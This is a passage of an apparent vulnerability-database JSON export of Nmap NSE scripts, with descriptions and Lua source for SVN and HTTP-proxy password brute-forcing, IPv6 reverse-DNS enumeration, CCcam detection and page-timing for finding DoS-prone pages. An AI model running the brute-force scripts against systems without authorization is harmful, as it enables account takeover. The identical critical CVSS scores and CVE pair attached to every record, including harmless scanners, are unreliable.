self.socket:receive_bytes(1)\n if ( not(status) ) then\n return false, \"error\"\n end\n\n challenge = msg:match(\"<.+>\")\n\n if ( not(challenge) ) then\n return 
false, \"Failed to read challenge\"\n end\n\n digest = stdnse.tohex(openssl.hmac('md5', password, challenge))\n msg = (\"%d:%s %s \"):format(#username + 1 + #digest, username, digest)\n self.socket:send( msg )\n\n status, msg = self.socket:receive_bytes(1)\n if ( not(status) ) then\n return false, \"error\"\n end\n\n if ( msg:match(\"Username not found\") ) then\n return false, \"Username not found\"\n elseif ( msg:match(\"success\") ) then\n return true, \"Authentication success\"\n else\n return false, \"Authentication failed\"\n end\n else\n return false, \"Unsupported auth-mechanism\"\n end\n\n end,\n\n --- Close the SVN connection\n --\n -- @return status true on success, false on failure\n close = function(self)\n return self.socket:close()\n end,\n\n}\n\n\nDriver =\n{\n new = function(self, host, port, invalid_users )\n local o = {}\n setmetatable(o, self)\n self.__index = self\n o.host = host\n o.port = port\n o.repo = stdnse.get_script_args('svn-brute.repo')\n o.invalid_users = invalid_users\n return o\n end,\n\n connect = function( self )\n local status, msg\n\n self.svn = svn:new( self.host, self.port, self.repo )\n status, msg = self.svn:connect()\n if ( not(status) ) then\n local err = brute.Error:new( \"Failed to connect to SVN server\" )\n -- This might be temporary, set the retry flag\n err:setRetry( true )\n return false, err\n end\n\n return true\n end,\n\n disconnect = function( self )\n self.svn:close()\n end,\n\n --- Attempts to login to the SVN server\n --\n -- @param username string containing the login username\n -- @param password string containing the login password\n -- @return status, true on success, false on failure\n -- @return brute.Error object on failure\n -- creds.Account object on success\n login = function( self, username, password )\n local status, msg\n\n if ( self.invalid_users[username] ) then\n return false, brute.Error:new( \"User is invalid\" )\n end\n\n status, msg = self.svn:login( username, password )\n\n if ( 
not(status) and msg:match(\"Username not found\") ) then\n self.invalid_users[username] = true\n return false, brute.Error:new(\"Username not found\")\n elseif ( status and msg:match(\"success\") ) then\n return true, creds.Account:new(username, password, creds.State.VALID)\n else\n return false, brute.Error:new( \"Incorrect password\" )\n end\n end,\n\n --- Verifies whether the repository is valid\n --\n -- @return status, true on success, false on failure\n -- @return err string containing an error message on failure\n check = function( self )\n local svn = svn:new( self.host, self.port, self.repo )\n local status = svn:connect()\n\n svn:close()\n\n if ( status ) then\n return true\n else\n return false, (\"Failed to connect to SVN repository (%s)\"):format(self.repo)\n end\n end,\n}\n\n\n\naction = function(host, port)\n local status, accounts\n\n local repo = stdnse.get_script_args('svn-brute.repo')\n local force = stdnse.get_script_args('svn-brute.force')\n\n if ( not(repo) ) then\n return \"No repository specified (see svn-brute.repo)\"\n end\n\n local svn = svn:new( host, port, repo )\n local status = svn:connect()\n\n if ( status and svn.auth_mech[\"ANONYMOUS\"] and not(force) ) then\n return \" \\n Anonymous SVN detected, no authentication needed\"\n end\n\n if ( not(svn.auth_mech) or not( svn.auth_mech[\"CRAM-MD5\"] ) ) then\n return \" \\n No supported authentication mechanisms detected\"\n end\n\n local invalid_users = {}\n local engine = brute.Engine:new(Driver, host, port, invalid_users)\n engine.options.script_name = SCRIPT_NAME\n status, accounts = engine:start()\n if( not(status) ) then\n return accounts\n end\n\n return accounts\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:45:54", "description": "Performs a quick reverse DNS lookup of an IPv6 network using a technique which analyzes DNS server response codes to dramatically reduce the number of queries needed to enumerate large networks. 
\n\nThe technique essentially works by prepending one hexadecimal digit (a nibble, i.e. one label of the ip6.arpa name) to a given IPv6 prefix and resolving it. If the added digit is correct, the server will return NOERROR (with no answer for the non-terminal name); if not, a NXDOMAIN result is received. The script therefore depends on the authoritative server distinguishing these two cases, and on the zone being delegated as a plain ip6.arpa hierarchy. \n\nThe technique is described in detail on Peter's blog: <http://7bits.nl/blog/2012/03/26/finding-v6-hosts-by-efficiently-mapping-ip6-arpa>\n\n### See also:\n\n * [ dns-nsec3-enum.nse ](<../scripts/dns-nsec3-enum.html>)\n * [ dns-nsec-enum.nse ](<../scripts/dns-nsec-enum.html>)\n * [ dns-brute.nse ](<../scripts/dns-brute.html>)\n * [ dns-zone-transfer.nse ](<../scripts/dns-zone-transfer.html>)\n\n## Script Arguments \n\n#### prefix \n\nthe ip6 prefix to scan, optionally with a /prefix-length suffix\n\n#### mask \n\nthe ip6 prefix length (in bits) to start scanning from; ignored when prefix already carries a /length, which takes precedence\n\n## Example Usage \n \n \n nmap --script dns-ip6-arpa-scan --script-args='prefix=2001:0DB8::/48'\n \n\n## Script Output \n \n \n Pre-scan script results:\n | dns-ip6-arpa-scan:\n | ip ptr\n | 2001:0DB8:0:0:0:0:0:2 resolver1.example.com\n |_2001:0DB8:0:0:0:0:0:3 resolver2.example.com\n \n\n## Requires \n\n * [coroutine](<>)\n * [dns](<../lib/dns.html>)\n * [ipOps](<../lib/ipOps.html>)\n * [nmap](<../lib/nmap.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [string](<>)\n * [tab](<../lib/tab.html>)\n * [table](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2012-04-01T13:04:23", "type": "nmap", "title": "dns-ip6-arpa-scan NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", 
"confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2018-10-24T19:36:04", "id": "NMAP:DNS-IP6-ARPA-SCAN.NSE", "href": "https://nmap.org/nsedoc/scripts/dns-ip6-arpa-scan.html", "sourceData": "local coroutine = require \"coroutine\"\nlocal dns = require \"dns\"\nlocal ipOps = require \"ipOps\"\nlocal nmap = require \"nmap\"\nlocal stdnse = require \"stdnse\"\nlocal string = require \"string\"\nlocal tab = require \"tab\"\nlocal table = require \"table\"\n\ndescription = [[\nPerforms a quick reverse DNS lookup of an IPv6 network using a technique\nwhich analyzes DNS server response codes to dramatically reduce the number of queries needed to enumerate large networks.\n\nThe technique essentially works by adding an octet to a given IPv6 prefix\nand resolving it. 
If the added octet is correct, the server will return\nNOERROR, if not a NXDOMAIN result is received.\n\nThe technique is described in detail on Peter's blog:\nhttp://7bits.nl/blog/2012/03/26/finding-v6-hosts-by-efficiently-mapping-ip6-arpa\n]]\n\n---\n-- @usage\n-- nmap --script dns-ip6-arpa-scan --script-args='prefix=2001:0DB8::/48'\n--\n-- @see dns-nsec3-enum.nse\n-- @see dns-nsec-enum.nse\n-- @see dns-brute.nse\n-- @see dns-zone-transfer.nse\n--\n-- @output\n-- Pre-scan script results:\n-- | dns-ip6-arpa-scan:\n-- | ip ptr\n-- | 2001:0DB8:0:0:0:0:0:2 resolver1.example.com\n-- |_2001:0DB8:0:0:0:0:0:3 resolver2.example.com\n--\n-- @args prefix the ip6 prefix to scan\n-- @args mask the ip6 mask to start scanning from\n\nauthor = \"Patrik Karlsson\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"intrusive\", \"discovery\"}\n\n\nlocal arg_prefix = stdnse.get_script_args(SCRIPT_NAME .. \".prefix\")\nlocal arg_mask = stdnse.get_script_args(SCRIPT_NAME .. \".mask\")\n\n-- Return a prefix and mask based on script arguments. First checks for \"/\"\n-- netmask syntax; then looks for a \"mask\" script argument if that fails. 
The\n-- \"/\" syntax wins over \"mask\" if both are present.\nlocal function get_prefix_mask(arg_prefix, arg_mask)\n if not arg_prefix then\n return\n end\n local prefix, mask = string.match(arg_prefix, \"^(.*)/(.*)$\")\n if not mask then\n prefix, mask = arg_prefix, arg_mask\n end\n return prefix, mask\nend\n\nprerule = function()\n local prefix, mask = get_prefix_mask(arg_prefix, arg_mask)\n return prefix and mask\nend\n\nlocal function query_prefix(query, result)\n local condvar = nmap.condvar(result)\n local status, res = dns.query(query, { dtype='PTR' })\n if ( not(status) and res == \"No Answers\") then\n table.insert(result, query)\n elseif ( status ) then\n local ip = query:sub(1, -10):gsub('%.',''):reverse():gsub('(....)', '%1:'):sub(1, -2)\n ip = ipOps.bin_to_ip(ipOps.ip_to_bin(ip))\n table.insert(result, { ptr = res, query = query, ip = ip } )\n end\n condvar \"signal\"\nend\n\naction = function()\n\n local prefix, mask = get_prefix_mask(arg_prefix, arg_mask)\n local query = dns.reverse(prefix)\n\n -- cut the query name down to the length of the prefix\n local len = (( mask / 8 ) * 4) + #(\".ip6.arpa\") - 1\n\n local found = { query:sub(-len) }\n local threads = {}\n\n local i = 20\n\n local result\n repeat\n result = {}\n for _, f in ipairs(found) do\n for q in (\"0123456789abcdef\"):gmatch(\"(%w)\") do\n local co = stdnse.new_thread(query_prefix, q .. \".\" .. 
f, result)\n threads[co] = true\n end\n end\n\n local condvar = nmap.condvar(result)\n repeat\n for t in pairs(threads) do\n if ( coroutine.status(t) == \"dead\" ) then threads[t] = nil end\n end\n if ( next(threads) ) then\n condvar \"wait\"\n end\n until( next(threads) == nil )\n\n if ( 0 == #result ) then\n return\n end\n\n found = result\n i = i + 1\n until( 128 == i * 2 + mask )\n\n table.sort(result, function(a,b) return (a.ip < b.ip) end)\n local output = tab.new(2)\n tab.addrow(output, \"ip\", \"ptr\")\n\n for _, item in ipairs(result) do\n tab.addrow(output, item.ip, item.ptr)\n end\n\n return \"\\n\" .. tab.dump(output)\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:43:08", "description": "Performs brute force password guessing against HTTP proxy servers.\n\nOnly Basic proxy authentication is supported: the script first confirms that an unauthenticated request yields HTTP 407 with a Proxy-Authenticate: Basic challenge and aborts otherwise. During guessing, any response other than 407 is treated as a valid login, so a proxy that answers a bad guess with some other status (for example a blocked destination or an upstream error) can produce false positives; verify reported credentials manually. Each guess is a request through the proxy to the configured URL, which is why the script is in the \"external\" category.\n\n## Script Arguments \n\n#### http-proxy-brute.url \n\nsets an alternative URL to use when brute forcing (default: <http://scanme.nmap.org/>)\n\n#### http-proxy-brute.method \n\nchanges the HTTP method to use when performing brute force guessing (default: HEAD)\n\n#### creds.[service], creds.global \n\nSee the documentation for the [creds](<../lib/creds.html#script-args>) library. \n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the [smbauth](<../lib/smbauth.html#script-args>) library. \n\n#### passdb, unpwdb.passlimit, unpwdb.timelimit, unpwdb.userlimit, userdb \n\nSee the documentation for the [unpwdb](<../lib/unpwdb.html#script-args>) library. \n\n#### brute.credfile, brute.delay, brute.emptypass, brute.firstonly, brute.guesses, brute.mode, brute.passonly, brute.retries, brute.start, brute.threads, brute.unique, brute.useraspass \n\nSee the documentation for the [brute](<../lib/brute.html#script-args>) library. \n\n#### slaxml.debug \n\nSee the documentation for the [slaxml](<../lib/slaxml.html#script-args>) library. 
\n\n#### http.host, http.max-body-size, http.max-cache-size, http.max-pipeline, http.pipeline, http.truncated-ok, http.useragent \n\nSee the documentation for the [http](<../lib/http.html#script-args>) library. \n\n## Example Usage \n \n \n nmap --script http-proxy-brute -p 8080 <host>\n \n\n## Script Output \n \n \n PORT STATE SERVICE\n 8080/tcp open http-proxy\n | http-proxy-brute:\n | Accounts\n | patrik:12345 - Valid credentials\n | Statistics\n |_ Performed 6 guesses in 2 seconds, average tps: 3\n \n\n## Requires \n\n * [base64](<../lib/base64.html>)\n * [brute](<../lib/brute.html>)\n * [creds](<../lib/creds.html>)\n * [http](<../lib/http.html>)\n * [shortport](<../lib/shortport.html>)\n * [stdnse](<../lib/stdnse.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2012-01-02T11:21:57", "type": "nmap", "title": "http-proxy-brute NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2015-11-05T20:41:05", "id": "NMAP:HTTP-PROXY-BRUTE.NSE", "href": "https://nmap.org/nsedoc/scripts/http-proxy-brute.html", "sourceData": "local base64 = require 
\"base64\"\nlocal brute = require \"brute\"\nlocal creds = require \"creds\"\nlocal http = require \"http\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\n\ndescription = [[\nPerforms brute force password guessing against HTTP proxy servers.\n]]\n\n---\n-- @usage\n-- nmap --script http-proxy-brute -p 8080 <host>\n--\n-- @output\n-- PORT STATE SERVICE\n-- 8080/tcp open http-proxy\n-- | http-proxy-brute:\n-- | Accounts\n-- | patrik:12345 - Valid credentials\n-- | Statistics\n-- |_ Performed 6 guesses in 2 seconds, average tps: 3\n--\n-- @args http-proxy-brute.url sets an alternative URL to use when brute forcing\n-- (default: http://scanme.insecure.org)\n-- @args http-proxy-brute.method changes the HTTP method to use when performing\n-- brute force guessing (default: HEAD)\n\nauthor = \"Patrik Karlsson\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\n\n-- maybe the script does not need to be in the external category\n-- as most request should not \"leave\" the proxy.\ncategories = {\"brute\", \"intrusive\", \"external\"}\n\n\nportrule = shortport.port_or_service({8123,3128,8000,8080},{'polipo','squid-http','http-proxy'})\n\nlocal arg_url = stdnse.get_script_args(SCRIPT_NAME .. '.url') or 'http://scanme.nmap.org/'\nlocal arg_method = stdnse.get_script_args(SCRIPT_NAME .. '.method') or \"HEAD\"\n\nDriver = {\n\n new = function(self, host, port)\n local o = { host = host, port = port }\n setmetatable(o, self)\n self.__index = self\n return o\n end,\n\n connect = function( self )\n return true\n end,\n\n login = function( self, username, password )\n\n -- the http library does not yet support proxy authentication, so let's\n -- do what's necessary here.\n local header = { [\"Proxy-Authorization\"] = \"Basic \" .. base64.enc(username .. \":\" .. 
password) }\n local response = http.generic_request(self.host, self.port, arg_method, arg_url, { header = header, bypass_cache = true } )\n\n -- if we didn't get a 407 error, assume the credentials\n -- were correct. we should probably do some more checks here\n if ( response.status ~= 407 ) then\n return true, creds.Account:new( username, password, creds.State.VALID)\n end\n\n return false, brute.Error:new( \"Incorrect password\" )\n end,\n\n disconnect = function( self )\n return true\n end,\n}\n\n-- checks whether the proxy really needs authentication and that the\n-- authentication mechanism can be handled by our script, currently only\n-- BASIC authentication is supported.\nlocal function checkProxy(host, port, url)\n local response = http.generic_request(host, port, arg_method, url, { bypass_cache = true })\n\n if ( response.status ~= 407 ) then\n return false, \"Proxy server did not require authentication\"\n end\n\n local proxy_auth = response.header[\"proxy-authenticate\"]\n if ( not(proxy_auth) ) then\n return false, \"No proxy authentication header was found\"\n end\n\n local challenges = http.parse_www_authenticate(proxy_auth)\n\n for _, challenge in ipairs(challenges) do\n if ( \"Basic\" == challenge.scheme ) then\n return true\n end\n end\n return false, \"The authentication scheme wasn't supported\"\nend\n\naction = function(host, port)\n\n local status, err = checkProxy(host, port, arg_url)\n if ( not(status) ) then\n return stdnse.format_output(false, err)\n end\n\n local engine = brute.Engine:new(Driver, host, port)\n engine.options.script_name = SCRIPT_NAME\n local result\n status, result = engine:start()\n\n return result\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:46:35", "description": "Detects the CCcam service (software for sharing subscription TV among multiple receivers). \n\nThe service normally runs on port 12000. 
It distinguishes itself by printing 16 random-looking bytes upon receiving a connection. \n\nBecause the script attempts to detect \"random-looking\" bytes, it has a small chance of failing to detect the service when the data do not seem random enough.\n\n## Example Usage \n \n \n nmap -sV <target>\n\n## Requires \n\n * [nmap](<../lib/nmap.html>)\n * [shortport](<../lib/shortport.html>)\n * [formulas](<../lib/formulas.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2012-01-27T01:13:35", "type": "nmap", "title": "cccam-version NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2014-02-13T16:39:17", "id": "NMAP:CCCAM-VERSION.NSE", "href": "https://nmap.org/nsedoc/scripts/cccam-version.html", "sourceData": "local nmap = require \"nmap\"\nlocal shortport = require \"shortport\"\nlocal formulas = require \"formulas\"\n\ndescription = [[\nDetects the CCcam service (software for sharing subscription TV among\nmultiple receivers).\n\nThe service normally runs on port 12000. 
It distinguishes\nitself by printing 16 random-looking bytes upon receiving a\nconnection.\n\nBecause the script attempts to detect \"random-looking\" bytes, it has a small\nchance of failing to detect the service when the data do not seem random\nenough.]]\n\ncategories = {\"version\"}\n\nauthor = \"David Fifield\"\n\nlocal NUM_TRIALS = 2\n\nlocal function trial(host, port)\n local status, data, s\n\n s = nmap.new_socket()\n status, data = s:connect(host, port)\n if not status then\n return\n end\n\n status, data = s:receive_bytes(0)\n if not status then\n s:close()\n return\n end\n s:close()\n\n return data\nend\n\nportrule = shortport.version_port_or_service({10000, 10001, 12000, 12001, 16000, 16001}, \"cccam\")\n\nfunction action(host, port)\n local seen = {}\n\n -- Try a couple of times to see that the response isn't constant. (But\n -- more trials also increase the chance that we will reject a legitimate\n -- cccam service.)\n for i = 1, NUM_TRIALS do\n local data\n\n data = trial(host, port)\n if not data or seen[data] or #data ~= 16 or not formulas.looksRandom(data) then\n return\n end\n seen[data] = true\n end\n\n port.version.name = \"cccam\"\n port.version.version = \"CCcam DVR card sharing system\"\n nmap.set_port_version(host, port)\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:44:23", "description": "Measures the time a website takes to deliver a web page and returns the maximum, minimum and average time it took to fetch a page. \n\nWeb pages that take longer time to load could be abused by attackers in DoS or DDoS attacks due to the fact that they are likely to consume more resources on the target server. This script could help identifying these web pages.\n\n## Script Arguments \n\n#### http-chrono.tries \n\nthe number of times to fetch a page based on which max, min and average calculations are performed.\n\n#### http-chrono.withindomain \n\nonly spider URLs within the same domain. 
This widens the scope from `withinhost` and can not be used in combination. (default: false)\n\n#### http-chrono.withinhost \n\nonly spider URLs within the same host. (default: true)\n\n#### http-chrono.maxdepth \n\nthe maximum amount of directories beneath the initial url to spider. A negative value disables the limit. (default: 3)\n\n#### http-chrono.maxpagecount \n\nthe maximum amount of pages to visit. A negative value disables the limit (default: 1)\n\n#### http-chrono.url \n\nthe url to start spidering. This is a URL relative to the scanned host eg. /default.html (default: /)\n\n#### slaxml.debug \n\nSee the documentation for the [slaxml](<../lib/slaxml.html#script-args>) library. \n\n#### httpspider.doscraping, httpspider.maxdepth, httpspider.maxpagecount, httpspider.noblacklist, httpspider.url, httpspider.useheadfornonwebfiles, httpspider.withindomain, httpspider.withinhost \n\nSee the documentation for the [httpspider](<../lib/httpspider.html#script-args>) library. \n\n#### http.host, http.max-body-size, http.max-cache-size, http.max-pipeline, http.pipeline, http.truncated-ok, http.useragent \n\nSee the documentation for the [http](<../lib/http.html#script-args>) library. \n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the [smbauth](<../lib/smbauth.html#script-args>) library. 
\n\n## Example Usage \n \n \n nmap --script http-chrono <ip>\n \n\n## Script Output \n \n \n PORT STATE SERVICE\n 80/tcp open http\n |_http-chrono: Request times for /; avg: 2.98ms; min: 2.63ms; max: 3.62ms\n \n PORT STATE SERVICE\n 80/tcp open http\n | http-chrono:\n | page avg min max\n | /admin/ 1.91ms 1.65ms 2.05ms\n | /manager/status 2.14ms 2.03ms 2.24ms\n | /manager/html 2.26ms 2.09ms 2.53ms\n | /examples/servlets/ 2.43ms 1.97ms 3.62ms\n | /examples/jsp/snp/snoop.jsp 2.75ms 2.59ms 3.13ms\n | / 2.78ms 2.54ms 3.36ms\n | /docs/ 3.14ms 2.61ms 3.53ms\n | /RELEASE-NOTES.txt 3.70ms 2.97ms 5.58ms\n | /examples/jsp/ 4.93ms 3.39ms 8.30ms\n |_/docs/changelog.html 10.76ms 10.14ms 11.46ms\n \n\n## Requires \n\n * [http](<../lib/http.html>)\n * [httpspider](<../lib/httpspider.html>)\n * [math](<>)\n * [shortport](<../lib/shortport.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [string](<>)\n * [tab](<../lib/tab.html>)\n * [table](<>)\n * [url](<../lib/url.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2012-03-23T19:29:44", "type": "nmap", "title": "http-chrono NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": 
false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2015-11-05T20:41:05", "id": "NMAP:HTTP-CHRONO.NSE", "href": "https://nmap.org/nsedoc/scripts/http-chrono.html", "sourceData": "local http = require \"http\"\nlocal httpspider = require \"httpspider\"\nlocal math = require \"math\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\nlocal string = require \"string\"\nlocal tab = require \"tab\"\nlocal table = require \"table\"\nlocal url = require \"url\"\n\ndescription = [[\nMeasures the time a website takes to deliver a web page and returns\nthe maximum, minimum and average time it took to fetch a page.\n\nWeb pages that take longer time to load could be abused by attackers in DoS or\nDDoS attacks due to the fact that they are likely to consume more resources on\nthe target server. This script could help identifying these web pages.\n]]\n\n---\n-- @usage\n-- nmap --script http-chrono <ip>\n--\n-- @output\n-- PORT STATE SERVICE\n-- 80/tcp open http\n-- |_http-chrono: Request times for /; avg: 2.98ms; min: 2.63ms; max: 3.62ms\n--\n-- PORT STATE SERVICE\n-- 80/tcp open http\n-- | http-chrono:\n-- | page avg min max\n-- | /admin/ 1.91ms 1.65ms 2.05ms\n-- | /manager/status 2.14ms 2.03ms 2.24ms\n-- | /manager/html 2.26ms 2.09ms 2.53ms\n-- | /examples/servlets/ 2.43ms 1.97ms 3.62ms\n-- | /examples/jsp/snp/snoop.jsp 2.75ms 2.59ms 3.13ms\n-- | / 2.78ms 2.54ms 3.36ms\n-- | /docs/ 3.14ms 2.61ms 3.53ms\n-- | /RELEASE-NOTES.txt 3.70ms 2.97ms 5.58ms\n-- | /examples/jsp/ 4.93ms 3.39ms 8.30ms\n-- |_/docs/changelog.html 10.76ms 10.14ms 11.46ms\n--\n-- @args http-chrono.maxdepth the maximum amount of directories beneath\n-- the initial url to spider. A negative value disables the limit.\n-- (default: 3)\n-- @args http-chrono.maxpagecount the maximum amount of pages to visit.\n-- A negative value disables the limit (default: 1)\n-- @args http-chrono.url the url to start spidering. This is a URL\n-- relative to the scanned host eg. 
/default.html (default: /)\n-- @args http-chrono.withinhost only spider URLs within the same host.\n-- (default: true)\n-- @args http-chrono.withindomain only spider URLs within the same\n-- domain. This widens the scope from <code>withinhost</code> and can\n-- not be used in combination. (default: false)\n-- @args http-chrono.tries the number of times to fetch a page based on which\n-- max, min and average calculations are performed.\n\n\nauthor = \"Ange Gutek\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"discovery\", \"intrusive\"}\n\n\nportrule = shortport.http\n\naction = function(host, port)\n\n local maxpages = stdnse.get_script_args(SCRIPT_NAME .. \".maxpagecount\") or 1\n local tries = stdnse.get_script_args(SCRIPT_NAME .. \".tries\") or 5\n\n local dump = {}\n local crawler = httpspider.Crawler:new( host, port, nil, { scriptname = SCRIPT_NAME, maxpagecount = tonumber(maxpages) } )\n crawler:set_timeout(10000)\n\n -- launch the crawler\n while(true) do\n local start = stdnse.clock_ms()\n local status, r = crawler:crawl()\n if ( not(status) ) then\n break\n end\n local chrono = stdnse.clock_ms() - start\n dump[chrono] = tostring(r.url)\n end\n\n -- retest each page x times to find an average speed\n -- a significant diff between instant and average may be an evidence of some weakness\n -- either on the webserver or its database\n local average,count,page_test\n local results = {}\n for result, page in pairs (dump) do\n local url_host, url_page = page:match(\"//(.-)/(.*)\")\n url_host = string.gsub(url_host,\":%d*\",\"\")\n\n local min, max, page_test\n local bulk_start = stdnse.clock_ms()\n for i = 1,tries do\n local start = stdnse.clock_ms()\n if ( url_page:match(\"%?\") ) then\n page_test = http.get(url_host,port,\"/\"..url_page..\"&test=\"..math.random(100), { no_cache = true })\n else\n page_test = http.get(url_host,port,\"/\"..url_page..\"?test=\"..math.random(100), { no_cache = true })\n end\n local count = 
stdnse.clock_ms() - start\n if ( not(max) or max < count ) then\n max = count\n end\n if ( not(min) or min > count ) then\n min = count\n end\n end\n\n local count = stdnse.clock_ms() - bulk_start\n table.insert(results, { min = min, max = max, avg = (count / tries), page = url.parse(page).path })\n end\n\n local output\n if ( #results > 1 ) then\n table.sort(results, function(a, b) return a.avg < b.avg end)\n output = tab.new(4)\n tab.addrow(output, \"page\", \"avg\", \"min\", \"max\")\n for _, entry in ipairs(results) do\n tab.addrow(output, entry.page, (\"%.2fms\"):format(entry.avg), (\"%.2fms\"):format(entry.min), (\"%.2fms\"):format(entry.max))\n end\n output = \"\\n\" .. tab.dump(output)\n else\n local entry = results[1]\n output = (\"Request times for %s; avg: %.2fms; min: %.2fms; max: %.2fms\"):format(entry.page, entry.avg, entry.min, entry.max)\n end\n return output\nend\n\n\n\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:45:43", "description": "Checks if the target IP range is part of a Zeus botnet by querying ZTDNS @ abuse.ch. 
Please review the following information before you start to scan: \n\n * <https://zeustracker.abuse.ch/ztdns.php>\n\n## Example Usage \n \n \n nmap -sn -PN --script=dns-zeustracker <ip>\n\n## Script Output \n \n \n Host script results:\n | dns-zeustracker:\n | Name IP SBL ASN Country Status Level Files Online Date added\n | foo.example.com 1.2.3.4 SBL123456 1234 CN online Bulletproof hosted 0 2011-06-17\n |_ bar.example.com 1.2.3.5 SBL123456 1234 CN online Bulletproof hosted 0 2011-06-15\n\n## Requires \n\n * [dns](<../lib/dns.html>)\n * [ipOps](<../lib/ipOps.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [stringaux](<../lib/stringaux.html>)\n * [tab](<../lib/tab.html>)\n * [table](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": 